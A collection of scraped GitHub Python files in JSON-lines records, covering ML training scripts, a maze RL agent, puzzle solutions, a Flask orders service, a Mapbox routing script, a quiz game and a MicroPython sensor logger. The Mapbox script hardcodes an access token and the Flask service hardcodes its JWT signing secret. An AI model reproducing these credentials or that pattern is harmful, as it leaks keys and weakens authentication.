shutil.copyfile(filename,os.path.join(directory, 'loss_best.pth'))\n\n'''args for not official Unet++ '''\ndef get_args():\n parser = OptionParser()\n parser.add_option('-e', '--epochs', dest='epochs', default=100, type='int',\n help='number of epochs')\n parser.add_option('-b', '--batch-size', dest='batchsize', default=6,\n type='int', help='batch size')\n parser.add_option('-l', '--learning-rate', dest='lr', default=0.1,\n type='float', help='learning rate')\n parser.add_option('-g', '--gpu', action='store_true', dest='gpu',\n default=True, help='use cuda')\n parser.add_option('-c', '--load', dest='load',\n default=False, help='load file model')\n parser.add_option('-s', '--scale', dest='scale', type='float',\n default=0.5, help='downscaling factor of the images')\n parser.add_option('--tensorboard', default=True,\n help='Log progress to TensorBoard', action='store_true')\n ##### for official unet++\n parser.add_option('--input-channels', default=3, type='int',\n help='input channels')\n parser.add_option('-d','--deepsupervision', default=0) \n ##############\n (options, args) = parser.parse_args()\n return options\n\n\nif __name__ == '__main__':\n args = get_args()\n\n net = UNet(n_channels=3, n_classes=1)\n # net = NestedUNet(args)\n if args.gpu:\n net.cuda()\n # cudnn.benchmark = True # faster convolutions, but more memory\n\n\n ######## model visualization in tensorboard ##############\n dummy_input = torch.rand(1,3,256,256).cuda()\n writer.add_graph(net,(dummy_input,))\n #########################################################\n\n \n if args.load:\n if os.path.isfile(args.load):\n print(\"=> loading checkpoint '{}'\".format(args.load))\n checkpoint = torch.load(args.load)\n args.start_epoch = checkpoint['epoch']\n best_dice = checkpoint['best_dice']\n best_loss = checkpoint['best_loss']\n net.load_state_dict(checkpoint['state_dict'])\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.load, checkpoint['epoch']))\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.load))\n\n try:\n train_net(args = args,\n net=net,\n epochs=args.epochs,\n batch_size=args.batchsize,\n lr=args.lr,\n gpu=args.gpu,\n img_scale=args.scale)\n\n torch.save(net,\n dir_model + 'CP{}.pth'.format('Unet+_200epoch'))\n except KeyboardInterrupt:\n torch.save(net.state_dict(), 'INTERRUPTED.pth')\n print('Saved interrupt')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n \n # writer.close()","repo_name":"MoriZSJ/Net_Pruning","sub_path":"pytorch_Unet++/train_unet++.py","file_name":"train_unet++.py","file_ext":"py","file_size_in_byte":9778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30411909183","text":"import numpy as np\n\nactionSpace = {'U': (-1, 0),'D': (1, 0), 'L': (0, -1), 'R': (0,1) }\n\nclass Agent(object):\n def __init__(self, maze, alpha=0.15, randomFactor=0.2):\n self.stateHistory = [((0, 0), 0)] # list of states and rewards\n self.alpha= alpha\n self.G = {}\n self.randomFactor= randomFactor\n self.initReward(maze.allowedStates)\n \n def initReward(self, states):\n for state in states:\n self.G[state] = np.random.uniform(low=-1.0, high=-0.1)\n \n def chooseAction(self, state, allowedMoves):\n maxG = -10e15\n nextMove = None\n randomN = np.random.random()\n if randomN < self.randomFactor:\n nextMove = np.random.choice(allowedMoves)\n else:\n for action in allowedMoves:\n newState = tuple([sum(x) for x in zip(state, actionSpace[action])])\n if self.G[newState] >= maxG:\n nextMove = action\n maxG = self.G[newState]\n return nextMove\n \n def updateStateHistory(self, state, reward):\n self.stateHistory.append((state, reward))\n \n def learn(self):\n target = 0 # we only learn when we beat the maze\n \n for prev, reward in reversed(self.stateHistory):\n self.G[prev] = self.G[prev] + self.alpha * (target - self.G[prev])\n target += reward\n \n self.stateHistory = []\n \n self.randomFactor -= 10e-5\n\n\n","repo_name":"genekuo/reinforcell","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1977691888","text":"class Nanobot:\n def __init__(self, x, y, z, r):\n self.x = x\n self.y = y\n self.z = z\n self.r = r\n\ndef is_in_range(x1, y1, z1, x2, y2, z2, r):\n return abs(x1 - x2) + abs(y1 - y2) + abs(z1 - z2) <= r\n\n\nwith open(\"aoc-23-1.txt\") as f:\n content = f.readlines()\n\ncontent = [x.strip() for x in content]\n\nbots = []\n\nfor line in content:\n posRad = line.split(' ')\n\n pos = posRad[0].split('=')[1].strip('<').strip('>,').split(',')\n rad = int(posRad[1].split('=')[1])\n bots.append(Nanobot(int(pos[0]), int(pos[1]), int(pos[2]), rad))\n\nbig_bot = None\nfor i in range(len(bots)):\n if big_bot is None or bots[i].r > big_bot.r:\n big_bot = bots[i]\n\ncount = 0\nfor i in range(len(bots)):\n if is_in_range(bots[i].x, bots[i].y, bots[i].z, big_bot.x, big_bot.y, big_bot.z, big_bot.r):\n count += 1\n\nprint(count)\n","repo_name":"woodgern/AdventOfCode2018","sub_path":"aoc-23-1.py","file_name":"aoc-23-1.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19127886511","text":"# Importing the necessary Python libraries\nimport os\nimport sys\nimport cloudpickle\nimport pandas as pd\nfrom category_encoders.one_hot import OneHotEncoder\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.linear_model import Lasso\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.pipeline import Pipeline\n\n# Importing the helper functions from other adjacent files\nfrom helpers import *\n\n\n\n## PROJECT SUPPORT\n## ---------------------------------------------------------------------------------------------------------------------\n# Pointing to the primary directory where data will be loaded and saved\nPRIMARY_DIRECTORY = '/opt/ml/'\n\n# Noting the subdirectories underneath the primary directory\nINPUT_PATH = os.path.join(PRIMARY_DIRECTORY, 'input/data/train')\nMODEL_PATH = os.path.join(PRIMARY_DIRECTORY, 'model')\nOUTPUT_PATH = os.path.join(PRIMARY_DIRECTORY, 'output')\n\n\n\n## MODEL TRAINING\n## ---------------------------------------------------------------------------------------------------------------------\ndef train(df_raw):\n \"\"\"\n Takes in the raw data for the movie rating model and trains the respective binary classfication and regression algorithms\n\n Args:\n - df_raw (Pandas DataFrame): A Pandas DataFrame containing the data that will be trained upon\n\n Returns:\n - binary_classification_pipeline (object): The trained version of the binary classification pipeline\n - regression_pipeline (object): The trained version of the regression pipeline\n \"\"\"\n\n # Instantiating a StandardScaler object for feature scaling\n feature_scaler = StandardScaler()\n\n # Creating the data preprocessor that will perform our feature engineering\n data_preprocessor = ColumnTransformer(transformers = [\n ('ohe_engineering', OneHotEncoder(use_cat_names = True, handle_unknown = 'ignore'), ['primary_genre', 'secondary_genre']),\n ('movie_age_engineering', FunctionTransformer(generate_movie_age, validate = False), ['year']),\n ('rt_critic_score_engineering', FunctionTransformer(engineer_rt_critic_score, validate = False), ['rt_critic_score']),\n ('rt_audience_score_engineering', FunctionTransformer(handle_nulls_for_rt_audience_score, validate = False), ['rt_audience_score']),\n ('metascore_engineering', FunctionTransformer(handle_nulls_for_metascore, validate = False), ['metascore']),\n ('columns_to_drop', 'drop', ['movie_name', 'tmdb_id', 'imdb_id', 'tmdb_popularity'])\n ],\n remainder = 'passthrough'\n )\n\n # Creating the full inference pipeline for the binary classification model\n binary_classification_pipeline = Pipeline(steps = [\n ('feature_engineering', data_preprocessor),\n ('predictive_modeling', RandomForestClassifier(n_estimators = 50,\n max_depth = 20,\n min_samples_split = 5,\n min_samples_leaf = 2))\n ])\n\n # Creating the full inference pipeline for the binary classification model\n regression_pipeline = Pipeline(steps = [\n ('feature_engineering', data_preprocessor),\n ('feature_scaling', feature_scaler),\n ('predictive_modeling', Lasso(alpha = 0.275))\n ])\n\n # Formally training the binary classification pipeline\n binary_classification_pipeline.fit(df_raw.drop(columns = ['biehn_yes_or_no', 'biehn_scale_rating']),\n df_raw[['biehn_yes_or_no']])\n\n # Formally training the regression pipeline\n regression_pipeline.fit(df_raw.drop(columns = ['biehn_yes_or_no', 'biehn_scale_rating']),\n df_raw[['biehn_scale_rating']])\n\n # Returning the trained pipelines\n return binary_classification_pipeline, regression_pipeline\n\n\n\n## SCRIPT INSTANTIATION\n## ---------------------------------------------------------------------------------------------------------------------\nif __name__ == \"__main__\":\n # Loading in the CSV from the output of the data collection\n df_raw = pd.read_csv(os.path.join(INPUT_PATH, 'all_data.csv'))\n\n # Training the binary classification and regression algorithms\n binary_classification_pipeline, regression_pipeline = train(df_raw)\n\n # Saving the binary classification pipeline to a serialized pickle file\n with open(os.path.join(MODEL_PATH, 'binary_classification_pipeline.pkl'), 'wb') as f:\n cloudpickle.dump(binary_classification_pipeline, f)\n\n # Saving the regression pipeline to a serialized pickle file\n with open(os.path.join(MODEL_PATH, 'regression_pipeline.pkl'), 'wb') as f:\n cloudpickle.dump(regression_pipeline, f)\n\n # Exiting with a zero code to let SageMaker know training job's success\n sys.exit(0)","repo_name":"dkhundley/movie-ratings-model","sub_path":"src/model-training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"72103639204","text":"import requests\nimport json\nimport src.testsMain as testsMain\nimport urllib.parse\n\nfile=open('json/stops per line.json', mode=\"r\")\nstops_of_line = json.load(file, encoding='utf-8')\nfile=open('json/lines of stop.json', mode=\"r\")\nlines_of_stop = json.load(file, encoding='utf-8')\nfile=open('json/stops.json', mode=\"r\")\nstops = json.load(file, encoding='utf-8')\n\ntoken = \"pk.eyJ1IjoiaXRhdiIsImEiOiJjbDIwaWRwZ3Ywd3E3M2JscDB1ZjV0bzh2In0.JNCksFOjVnpes6dbdYR24w\"\n\nurl = \"https://api.mapbox.com/directions/v5/mapbox/driving/-8.6547145 , 40.6316261 ;-8.6557297 , 40.6349165 ;-8.6560068 , 40.640963?alternatives=false&geometries=geojson&overview=simplified&steps=false&access_token={}\".format(token)\n\n\n#print(url)\n# count=0\n#response = requests.get(\"https://api.mapbox.com/directions/v5/mapbox/driving/-8.6547145%2C40.6316261%3B-8.6557297%2C40.6349165?alternatives=false&geometries=geojson&overview=simplified&steps=false&access_token=pk.eyJ1IjoiaXRhdiIsImEiOiJjbDIwaWRwZ3Ywd3E3M2JscDB1ZjV0bzh2In0.JNCksFOjVnpes6dbdYR24w\")\n\n# print(response)\n# for line in stops_of_line:\n \n# print(line, \"line\")\n# count = 0\n\nposicao=\"-8.5998204,40.6813118\" #!vem da app\n\n\nstr1=\"{};\".format(posicao)\nstr2=\"\"\nstr3=\"\"\nfinal={}\nline = '1' #vem da funcao que pede\n\nlength= len(stops_of_line[line])\n\n\nfor i in range(length) :\n \n stop = stops_of_line[line][i]\n if (i<=24):\n print(stop['lon'],\",\" ,stop['lat'], \";\")\n str1+=\"{},{};\".format(stop['lon'],stop['lat'])\n \n elif (i>24 and i<=49):\n print(stop['lon'],\",\" ,stop['lat'], \";\")\n str2+=\"{},{};\".format(stop['lon'],stop['lat'])\n else:\n print(stop['lon'],\",\" ,stop['lat'], \";\")\n str3+=\"{},{};\".format(stop['lon'],stop['lat'])\n \n\nurl1=\"https://api.mapbox.com/directions/v5/mapbox/driving/{}?alternatives=false&continue_straight=false&geometries=geojson&overview=simplified&steps=false&access_token={}\".format(str1[:-1],token)\nurl2=\"https://api.mapbox.com/directions/v5/mapbox/driving/{}?alternatives=false&continue_straight=false&geometries=geojson&overview=simplified&steps=false&access_token={}\".format(str2[:-1],token) if str2 else None\nurl3=\"https://api.mapbox.com/directions/v5/mapbox/driving/{}?alternatives=false&continue_straight=false&geometries=geojson&overview=simplified&steps=false&access_token={}\".format(str3[:-1],token) if str3 else None\n\nresponse = requests.get(url1).json()\nresponse2= requests.get(url2).json() if url2 else {}\nresponse3= requests.get(url3).json() if url3 else {}\nprint(url1)\n\nfor number in range(len(response['routes'][0]['legs'])):\n if (number<=24):\n final[number]=response['routes'][0]['legs'][number]['duration']\n elif (number>24 and number<=49):\n final[number]=response2['routes'][0]['legs'][number-25]['duration']\n else:\n final[number]=response3['routes'][0]['legs'][number-50]['duration']\n\n\nwith open('json/line1.json', 'w') as outfile:\n json.dump(final, outfile, ensure_ascii=False)\n#print(response.json())","repo_name":"AlexandreGago/linie","sub_path":"TRASH/directionsShadowrealm.py","file_name":"directionsShadowrealm.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35805515196","text":"import streamlit as st\nimport pandas as pd\n\n# Set up Streamlit layout and configuration\nst.set_page_config(\n page_title=\"Sleep Health Analyzer\",\n layout=\"wide\"\n)\n\n# Main app header\nst.title(\"Sleep Health Analyzer\")\nst.write(\"Welcome to the app!\")\n\n# Load data from CSV file\ndata = pd.read_csv(\"sleep.csv\")\n\n# Sidebar for user inputs\nst.sidebar.title(\"Filter Data\")\nselected_occupation = st.sidebar.selectbox(\"Select Occupation\", data[\"Occupation\"].unique())\nselected_age_range = st.sidebar.slider(\"Select Age Range\", int(data[\"Age\"].min()), int(data[\"Age\"].max()), (int(data[\"Age\"].min()), int(data[\"Age\"].max())))\n\n# Apply filters to the data\nfiltered_data = data[(data[\"Occupation\"] == selected_occupation) & (data[\"Age\"].between(selected_age_range[0], selected_age_range[1]))]\n\n# Display filtered data\nst.header(\"Filtered Data\")\nst.write(filtered_data)\n\n# Sleep duration analysis\nst.header(\"Sleep Duration Analysis\")\nst.subheader(\"Average Sleep Duration by Gender\")\naverage_sleep_duration_gender = filtered_data.groupby(\"Gender\")[\"Sleep Duration\"].mean()\nst.bar_chart(average_sleep_duration_gender)\n\n# Quality of sleep analysis\nst.header(\"Quality of Sleep Analysis\")\nst.subheader(\"Distribution of Quality of Sleep\")\nquality_of_sleep_counts = filtered_data[\"Quality of Sleep\"].value_counts()\nst.bar_chart(quality_of_sleep_counts)\n\n# Other analyses and visualizations can be added here\n","repo_name":"ShraboniBanerjee/Sleep-Lifestyle-Analyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7169628784","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom models import Order, db\nimport requests\nfrom sqlalchemy.exc import IntegrityError\nimport os\nimport json\nimport jwt\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\nCORS(app)\n\nbase_dir = os.path.abspath(os.path.dirname(__file__))\ndb_path = os.path.join(base_dir, '../data/orders.db')\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:////' + db_path)\n\ndb.init_app(app)\n\nPRODUCTS_SERVICE_URL = \"http://products:5001\"\nAUTH_SERVICE_URL = \"http://auth:5000\"\n\nSECRET_KEY = '32f7d11a6d4ab32c2ad57029f1c42b13e02e2707b4e3f30a4f1e3f4853a731e3'\n\ndef validate_token(token):\n try:\n response = requests.post(f\"{AUTH_SERVICE_URL}/validate_token\", json={\"token\": token})\n response.raise_for_status()\n print(response)\n return True if response.json().get(\"valid\") else False\n except requests.exceptions.RequestException as e:\n print(f\"Error validating token: {e}\")\n return False\n\n@app.route('/create_order', methods=['POST'])\ndef create_order():\n token = request.headers.get('Authorization')\n if token and token.startswith('Bearer '):\n token = token[7:] \n if not token:\n return jsonify({\"message\": \"Token is missing\"}), 401\n\n if not validate_token(token):\n return jsonify({\"message\": \"Invalid token\"}), 401\n\n try:\n token_data = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])\n user_id = token_data['username']\n except jwt.ExpiredSignatureError:\n return jsonify({\"message\": \"Token has expired\"}), 401\n except jwt.InvalidTokenError:\n return jsonify({\"message\": \"Invalid token here\"}), 401 \n\n data = request.get_json()\n items = data.get('items', [])\n\n if not isinstance(items, list) or not all(isinstance(item, dict) for item in items):\n return jsonify({'message': 'Invalid format for items'}), 400\n\n total_price = 0\n product_ids = []\n products_details = {}\n\n for item in items:\n product_id = item.get('product_id')\n quantity = item.get('quantity')\n\n if quantity is None:\n return jsonify({'message': 'Quantity is required for each item'}), 400\n\n product_ids.append(product_id)\n\n product_details_response = requests.get(f\"{PRODUCTS_SERVICE_URL}/products/{product_id}\")\n\n if product_details_response.status_code != 200:\n return jsonify({'message': f'Product with ID {product_id} not found'}), 404\n\n product_details = product_details_response.json()\n products_details[product_id] = product_details\n\n item_price = product_details['price'] * quantity\n total_price += item_price\n\n new_order = Order(user_id=user_id, total_price=total_price, quantity=quantity)\n db.session.add(new_order)\n try:\n db.session.commit()\n return jsonify({'message': 'Order created successfully', 'total_price': total_price, 'product_ids': product_ids, 'products': product_details}), 201\n except IntegrityError:\n db.session.rollback()\n return jsonify({'message': 'Order creation failed. Duplicate order.'}), 400\n\nif __name__ == '__main__':\n with app.app_context():\n db.create_all()\n app.run(host='0.0.0.0', port=5002)\n","repo_name":"Workerlimit/WebApplicationDev","sub_path":"endterm/orders/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28536984739","text":"\"\"\"\nWBF (weighted box fusion) 방식의 앙상블\n여러 모델(또는 앙상블)의 inference를 test.py의 --save-output 옵션을 이용하여 저장한 뒤,\n본 script 실행시 입력하여 앙상블을 할 수 있다.\n앙상블한 결과를 test.py에 --load-output-pickle 옵션을 이용해 입력하면, evaluation 할 수 있다.\n\"\"\"\nimport argparse\nimport pickle\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom ensemble_boxes import weighted_boxes_fusion\nimport torch\nfrom tqdm import tqdm\n\n\ndef get_input_args() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument('--preds', nargs='+', help='pickle files of predictions(inferences)')\n parser.add_argument('--dst', type=str, help='path to save ensemble result to')\n parser.add_argument('--weights', nargs='+', default=[], help='weights of predictions(inferences)')\n parser.add_argument('--img-width', type=int, default=704,\n help='image width, this value is used for normalizing boxes\\' coordinates')\n parser.add_argument('--img-height', type=int, default=448,\n help='image height, this value is used for normalizing boxes\\' coordinates')\n parser.add_argument('--iou-thr', type=float, default=0.7, help='iou-thr of WBF')\n parser.add_argument('--skip-box-thr', type=float, default=0.0001, help='skip-box-thr of WBF')\n\n return parser.parse_args()\n\n\ndef load_outputs_and_group_by_image(pickle_file_path_list: List[str]) -> List[Tuple[torch.Tensor]]:\n \"\"\"\n 각 모델 또는 앙상블의 inference 결과가 저장된 pickle 파일을 로드한다.\n 이미지 별로 각 inference의 box들 grouping 해놓는다.\n Args:\n pickle_file_path_list: inference 결과가 저장된 pickle file 경로 리스트,\n 각 pickle 파일은 test.py에서 --save-output 옵션을 통해 저장할 수 있다.\n\n Returns: 이미지 별 각 inference의 box 들\n\n \"\"\"\n model_results: List[List[torch.Tensor]] = [] # model - image - box\n for pickle_file_path in pickle_file_path_list:\n with open(pickle_file_path, 'rb') as pkl_file:\n model_results.append(pickle.load(pkl_file))\n\n model_results_by_image: List[Tuple[torch.Tensor]] = list(zip(*model_results)) # image - model - box\n return model_results_by_image\n\n\ndef ensemble(model_results_by_image: List[Tuple[torch.Tensor]],\n weights: List[float],\n img_width: int,\n img_height: int,\n iou_thr: float,\n skip_box_thr: float\n ) -> List[torch.Tensor]:\n \"\"\"\n WBF (weighted box fusion) 방식으로 앙상블 한다.\n 앙상블 결과를 test.py에서 저장 또는 로드하는 inference output과 같은 format으로 맞춰준다.\n Args:\n model_results_by_image:load_outputs_and_group_by_image 함수로 부터 얻을 수 있는 이미지 별 각 inference의 box 들\n weights: 각 inference 에 적용될 가중치\n img_width:\n img_height:\n iou_thr:\n skip_box_thr:\n\n Returns: 앙상블 결과 (test.py에서 저장 또는 로드하는 inference output과 같은 format)\n\n \"\"\"\n normalize_divider = np.array([img_width, img_height, img_width, img_height], dtype=np.float32)\n unnormalize_factor = normalize_divider\n\n def get_boxes_in_a_image(yolo_preds: torch.Tensor) -> Tuple[List[np.ndarray], List[float], List[int]]:\n normalized_boxes: List[np.ndarray] = []\n scores: List[float] = []\n labels: List[int] = []\n yolo_preds_np = yolo_preds.cpu().numpy()\n for yolo_pred in yolo_preds_np:\n normalized_boxes.append(yolo_pred[:4] / normalize_divider)\n scores.append(yolo_pred[4])\n labels.append(int(yolo_pred[5]))\n\n return normalized_boxes, scores, labels\n\n def get_yolo_format_preds(normalized_boxes: List[np.ndarray], scores: List[float], labels: List[int]) \\\n -> torch.Tensor:\n yolo_preds_list: List[np.ndarray] = []\n for box, score, label in zip(normalized_boxes, scores, labels):\n unnormalized_box = box * unnormalize_factor\n yolo_pred = np.array([*unnormalized_box, score, label], dtype=np.float32)\n yolo_preds_list.append(yolo_pred)\n\n return torch.tensor(yolo_preds_list)\n\n ensemble_results: List[torch.Tensor] = []\n for model_results_for_a_image in tqdm(model_results_by_image):\n boxes_list: List[List[np.ndarray]] = []\n scores_list: List[List[float]] = []\n labels_list: List[List[int]] = []\n for a_model_result_for_a_image in model_results_for_a_image:\n boxes, scores, labels = get_boxes_in_a_image(a_model_result_for_a_image)\n boxes_list.append(boxes)\n scores_list.append(scores)\n labels_list.append(labels)\n\n ensemble_boxes, ensemble_scores, ensemble_labels = \\\n weighted_boxes_fusion(boxes_list, scores_list, labels_list,\n weights=weights,\n iou_thr=iou_thr,\n skip_box_thr=skip_box_thr)\n\n yolo_format_preds_for_a_image = get_yolo_format_preds(ensemble_boxes, ensemble_scores, ensemble_labels)\n ensemble_results.append(yolo_format_preds_for_a_image)\n\n return ensemble_results\n\n\ndef save(results: List[torch.Tensor], dst_path: str) -> None:\n \"\"\"\n 결과를 pickle 파일로 저장한다.\n pickle파일을 test.py 에 입력하여 evaluation 할 수 있다.\n Args:\n results: 앙상블 결과\n dst_path: 결과를 저장할 경로\n\n Returns: None\n \"\"\"\n with open(dst_path, 'wb') as dst_pkl_file:\n pickle.dump(results, dst_pkl_file)\n print(f'Saved - {dst_path}')\n\n\nif __name__ == '__main__':\n in_args = get_input_args()\n\n if not in_args.weights:\n in_args.weights = [1. for _ in range(len(in_args.preds))]\n else:\n in_args.weights = [float(weight) for weight in in_args.weights]\n\n print(in_args)\n\n preds_by_image = load_outputs_and_group_by_image(in_args.preds)\n ensemble_res = ensemble(preds_by_image,\n in_args.weights,\n in_args.img_width,\n in_args.img_height,\n in_args.iou_thr,\n in_args.skip_box_thr)\n save(ensemble_res, in_args.dst)\n","repo_name":"WonsangHwang/busan_detection_hackathon","sub_path":"ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"21688793321","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom copy import deepcopy as dp\nfrom src import raytrace_\n\n\norigem = [1,1,1]\nl = 10\nr = 5\nt = 10\nb = 5\nnx = 5\nny = 5\ndistance = 1\n\nfig = plt.figure()\nax = fig.gca(projection='3d')\n\ndirections = raytrace_.compute_directions(origem, distance, l, r, t, b, nx, ny)\n# ax.quiver(0, 0, 0, 1, 1, 1, normalize=True)\norigem = np.dot(raytrace_.compute_vector_w(origem),-1)\n\nfor i in directions:\n ax.quiver(origem[0],origem[1],origem[2],i[2],i[1],i[0])\nplt.show()\n","repo_name":"CAECOMP/provas","sub_path":"S07 - Computação Gráfica/2018.1 Lucas Souza/RayTrace/playground/plots 3d.py","file_name":"plots 3d.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"52"} +{"seq_id":"41258920009","text":"from scraper import Scraper\nfrom pokemon import Pokemon\nimport random\n\nclass Quiz:\n colors = {\n \"normal\": \"\\033[1;37;40m\",\n \"fire\": \"\\033[1;31;40m\",\n \"water\": \"\\033[1;34;40m\",\n \"grass\": \"\\033[1;32;40m\",\n \"flying\": \"\\033[1;37;40m\",\n \"fighting\": \"\\033[1;31;40m\",\n \"poison\": \"\\033[1;35;40m\",\n \"electric\": \"\\033[1;33;40m\",\n \"ground\": \"\\033[1;33;40m\",\n \"rock\": \"\\033[1;32;40m\",\n \"psychic\": \"\\033[1;35;40m\",\n \"bug\": \"\\033[1;32;40m\",\n \"ghost\": \"\\033[1;35;40m\",\n \"dark\": \"\\033[1;37;40m\",\n \"steel\": \"\\033[1;37;40m\",\n \"ice\": \"\\033[1;36;40m\",\n \"dragon\": \"\\033[1;34;40m\",\n \"fairy\": \"\\033[1;33;40m\",\n \"correct\": \"\\033[1;32;40m\",\n \"incorrect\": \"\\033[1;31;40m\",\n \"reset\": \"\\033[0m\"\n }\n\n def __init__(self, show_types, all_answers):\n self.scraped_pokemon = []\n self.show_types = show_types\n self.all_answers = all_answers\n self.scraper = Scraper()\n self.national_dex = self.scraper.set_national_dex()\n \n def run(self):\n self.rules()\n self.setup()\n correct_answer = self.question()\n self.ending(correct_answer)\n\n def setup(self):\n # TODO: currently not using the most recent generation until pokemon.com/pokedex is updated \n # replace the following two lines when it is\n # poke_id = random.randint(1,len(self.national_dex))\n poke_id = random.randint(1,809)\n self.answer_pokemon = self.find_from_scraped(poke_id)\n if not self.answer_pokemon:\n self.answer_pokemon = self.scraper.fetch_pokemon_data(self.national_dex[poke_id-1])\n self.scraped_pokemon.append(self.answer_pokemon)\n \n def find_from_scraped(self, id):\n for poke in self.scraped_pokemon:\n if poke.id == id:\n return poke\n return None\n \n def rules(self):\n print(\"\")\n print(\"{}Welcome trainer, to the Pokemon Types Quiz!{}\".format(self.colors[\"normal\"], self.colors[\"reset\"]))\n print(\"You will be presented with a pokemon's name{}, and must guess what type{} effective against it\".format((\" and types\" if self.show_types else \"\"), (\"s are\" if self.all_answers else \" is\")))\n \n def question(self):\n print(\"\")\n print(\"Pokemon's name: {}{}{}\".format(self.colors[\"normal\"], self.answer_pokemon.name.title(), self.colors[\"reset\"]))\n if self.show_types:\n types = []\n for type in self.answer_pokemon.types:\n types.append(self.colors[type] + type + self.colors[\"reset\"])\n print(\"Pokemon's types(s): {}\".format(\" & \".join(types))) \n\n print(\"What super effective against {}{}{}\".format(self.colors[\"normal\"], self.answer_pokemon.name.title(), self.colors[\"reset\"]))\n if self.all_answers:\n print(\"Enter all possible answers, seperated by a comma and a space (e.g. \\\"fire, water, bug\\\")\")\n answer = self.validate_answer()\n else:\n answer = self.validate_answer(\"Enter a single pokemon type: \")\n\n return self.check_answer(answer)\n\n def validate_answer(self, msg = \"\"):\n answer = \"\"\n print(\"(for a list of types, enter \\\"help\\\")\")\n while answer is \"\":\n answer = input(msg).lower()\n if answer == \"help\":\n self.list_types()\n answer = \"\"\n print(\"What super effective against {}{}{}\".format(self.colors[\"normal\"], self.answer_pokemon.name.title(), self.colors[\"reset\"]))\n return answer\n\n def check_answer(self, answer):\n if self.all_answers:\n return self.answer_pokemon.matches_all_weaknesses(answer.split(\", \"))\n else:\n return self.answer_pokemon.is_weak_to(answer)\n \n def list_types(self):\n types = []\n for type in Pokemon.all_types:\n \n types.append(self.colors[type] + type + self.colors[\"reset\"])\n print(\"All types: {}\".format(\", \".join(types))) \n \n def ending(self, correct_answer):\n print()\n if correct_answer:\n print(self.colors[\"correct\"] + \"Congratulations, you are correct!\" + self.colors[\"reset\"])\n else:\n if self.all_answers:\n print(self.colors[\"incorrect\"] + \"Sorry, that was not all of the pokemon's weaknesses. They were:\" + self.colors[\"reset\"])\n else:\n print(self.colors[\"incorrect\"] + \"Sorry, that is not in the list of the pokemon's weaknesses. They were:\" + self.colors[\"reset\"])\n weaknesses = []\n for weakness in self.answer_pokemon.weaknesses:\n weaknesses.append(self.colors[weakness] + weakness + self.colors[\"reset\"])\n print(\"Pokemon's weaknesses: {}\".format(\", \".join(weaknesses))) \n \n replay = input(\"Would you like to play again? (y/n): \").lower()\n while not replay in [\"yes\", \"y\", \"no\", \"n\"]:\n print(\"I don't understand that input\")\n replay = input(\"Would you like to play again? (y/n): \").lower()\n \n if replay in [\"yes\", \"y\"]:\n self.run()\n else:\n print(\"Thank you for playing, goodbye!\")\n","repo_name":"cdallasanta/poke-quiz","sub_path":"quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40015841417","text":"import os\r\n\r\ndef rejected_counter(path_folder):\r\n tot=0\r\n for folder in os.listdir(path_folder):\r\n c=0\r\n for item in os.listdir(os.path.join(path_folder,folder)):\r\n c+=1\r\n tot+=c\r\n print(\"Rejected in folder \"+path_folder+folder+\": \", c)\r\n print(\"Rejected tot: \",tot)\r\n\r\n\r\nif __name__ == '__main__':\r\n path_rejected_folder=\"\"\r\n rejected_counter(path_rejected_folder)","repo_name":"comarco99/HeadPoseEstimation_FVAB","sub_path":"RejectedAnalyzer.py","file_name":"RejectedAnalyzer.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20960314511","text":"from machine import Pin, I2C\nimport utime\nimport sh1106\nimport dht\n\n\nancho=128\nalto=64\n\ni2c=I2C(0,scl=Pin(22),sda=Pin(21))\noled = sh1106.SH1106_I2C(ancho, alto, i2c)\n\nfile=open(\"dato.csv\",\"w\")\n\nd=dht.DHT11(Pin(5))\n\nwhile True:\n d.measure()\n oled.fill(0)\n print(f'Temperatura: {str(d.temperature())} Humedad: {str(d.humidity())}')\n oled.text(f'Temperatura: {str(d.temperature())}', 0, 0,1) \n oled.text(f'Humedad: {str(d.humidity())}', 0, 10,1) \n\n file.write(str(f'Temperatura: {str(d.temperature())} Humedad: {str(d.humidity())} \\n'))\n \n file.flush()\n oled.show()\n 